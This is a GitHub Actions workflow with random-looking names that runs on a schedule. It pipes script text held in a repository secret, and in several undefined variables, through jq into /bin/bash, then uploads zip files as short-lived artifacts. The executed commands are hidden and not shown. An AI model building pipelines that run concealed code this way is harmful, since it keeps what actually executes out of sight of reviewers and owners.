name: shizhaotongwu
on:
  workflow_dispatch:

  schedule:
    - cron: '54 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shizhaotongwu
        env:
          t57: ${{ secrets.t57 }}
        run: |
          printf '%s' "$t57" | jq -r .tl6219 | /bin/bash
          echo $syyoc6 | jq -r .phm8347 | /bin/bash
          echo $eq53112 | jq -r .qvbze29 | /bin/bash
          printf '%s' "$nxmff03432" | jq -r .aedr912 | /bin/bash
          printf '%s' "$c63464" | jq -r .h466 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: NkTNbPLZ
          path: "*.zip"
          retention-days: 1
